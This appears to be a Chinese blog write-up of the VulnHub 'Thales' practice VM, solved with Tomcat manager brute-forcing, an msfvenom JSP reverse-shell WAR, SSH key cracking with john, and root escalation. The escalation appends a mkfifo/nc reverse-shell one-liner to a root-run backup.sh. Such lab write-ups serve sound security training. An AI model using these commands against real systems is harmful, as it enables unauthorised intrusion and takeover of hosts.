首页 > 其他分享 >vulnhub靶场:Thales

vulnhub靶场:Thales

时间:2023-06-28 15:12:05浏览次数:41  
标签:6.81 shell 文件 Thales 172.88 vulnhub 靶场 txt

靶场地址:泰雷兹: 1 ~ VulnHub

kali:172.88.6.144

靶场:172.88.6.81

 

nmap 172.88.6.0/24

 nmap -T4 -sV -P  -A 172.88.6.81

 

访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下

 msfconsole

search tomcat

 

 use auxiliary/scanner/http/tomcat_mgr_login

set rhosts 172.88.6.81

run

 

[+] 172.88.6.81:8080 - Login Successful: tomcat:role1

得出账户和密码

 

没有找到相关信息,返回重新登录

 

 

 在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell:msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.88.6.144 LPORT=8888 -f war -o shell.war,然后将文件上传到靶场中还要在kali中nc,nc -lvvp 8888,上传成功,访问下文件就好了

 

 

python3 -c 'import pty;pty.spawn("/bin/bash")'

在/home/thales中发现了两个文件,notes.txt中有一个提示,user.txt无权限读取

 .ssh目录下有公私钥

 

在kali中创建文件,把私钥放进去,在/usr/share/john目录中有一个文件ssh2john.py,输入python3 ssh2john.py /root/Thales > /root/password,生成一个密码本

john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件

john --wordlist=/usr/share/wordlists/rockyou.txt  /root/password

 

 爆破出的密码为:vodka06

 

找到一个:a837c0b5d2a8a07225fd9905f5a0e9c4

 这个back.sh文件具有root权限,所以写入一句话

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.88.6.144 1235 >/tmp/f" >> backup.sh

nc -lvnp 1235,等待一分钟就好了

 

 

 

这个靶场总的来说不算难,也就是破解秘钥和反弹shell

标签:6.81,shell,文件,Thales,172.88,vulnhub,靶场,txt
From: https://www.cnblogs.com/ndy619/p/17511431.html

相关文章

  • xss漏洞攻击复现(xssgame靶场通关)
     这篇文章简单的介绍下xssgame的通关方法,从名字可以看出,xssgame就是针对xss攻击进行专门的漏洞复现,由易到难。 链接:https://pan.baidu.com/s/1F9I7iBdu7MPLLvegM5kAQg 提取码:469c 这是xssgame的安装包,将它放到phpstudy/WWW文件夹下访问即可 第一关 这一关没有任......
  • vulnhun靶场:Red.ova
    靶场下载:Red:1~VulnHubkali:172.88.6.144靶场:172.88.6.70 靶场页面是这个,第一次没有找到ip,使用桥接找到了nmap172.88.6.0/24 访问ip    找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host   直接打开代码没有发现什......
  • Vulnhub_Broken_WP
    前言靶机下载地址-->https://www.vulnhub.com/靶机探测nmap-sn192.168.20.0/24192.168.20.140是新出现的ip详细信息扫描nmap-A-p-192.168.20.140这里可以发现nmap已经扫到了一些网站目录,一个说明文件和图片漏洞扫描nmapnmap-p22,80--script=vuln192.168.20.......
  • vulnhun靶场:jangow-01-1.0.1
    kali:172.88.6.144靶场:172.88.6.64靶场地址:Jangow:1.0.1~VulnHub 访问ip  点击右上角的buscar   写入一句话:echo'<?phpeval($_POST['shell']);?>'>upfine.php  在wordpress里面有两个文件,分别是config.php、index.html 在/var/www/html/.back......
  • vulnhub之VulnHub2018_DeRPnStiNK
    一、信息获取1、tcp开放端口获取─$cattcp_open_port.nmap#Nmap7.93scaninitiatedSatJun2416:48:232023as:nmap--min-rate10000-p--oAtcp_open_port192.168.62.198Nmapscanreportfor192.168.62.198Hostisup(0.0014slatency).Notshown:65532clos......
  • vulnhub靶机练习:01-Empire-Lupin-One
    这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l  扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描    d......
  • vulnhub靶场搭建
    vulnhub靶场搭建kali虚拟机安装1、更新sudoapt-getupdate2、安装docker.iosudoaptinstalldocker.io3、验证安装docker-v4、安装docker-composepipinstalldocker-compose5、拉取镜像gitclonehttps://github.com/vulhub/vulhub.git6、进行测试cdvulnhub......
  • vulnhub-xxe靶场通关(xxe漏洞续)
    vulnhub-xxe靶场通关(xxe漏洞续)下面简单介绍一个关于xxe漏洞的一个靶场,靶场来源:https://www.vulnhub.com这里面有很多的靶场。靶场环境需要自己下载:https://download.vulnhub.com/xxe/XXE.zip因为是外国的靶场,下载速度有点慢,也可以通过公众号——星光安全,回复“xxe靶场”获得。......
  • DVWA靶场之SQL注入通关详解
    原理SQL注入通过将恶意的SQL代码插入到应用程序后台的SQL语句中,以获取未授权的访问权限或者窃取应用程序中的敏感信息。通常,SQL注入攻击的目标是Web应用程序,因为Web应用程序通常需要与数据库进行交互,并且大多数Web应用程序使用的是SQL语言。存在原因Web应用程序没有对用户输入......
  • DVWA靶场之文件上传通关详解
    原理文件上传漏洞是应用程序在处理用户上传的文件时没有对文件进行合理的检查和过滤,而恶意文件由攻击者伪造成合法文件,从而骗过应用程序进行上传和执行恶意代码。存在原因开发人员没有对用户上传的文件进行充分的验证和过滤。攻击者可以通过构造恶意文件,利用上传漏洞将其上传到......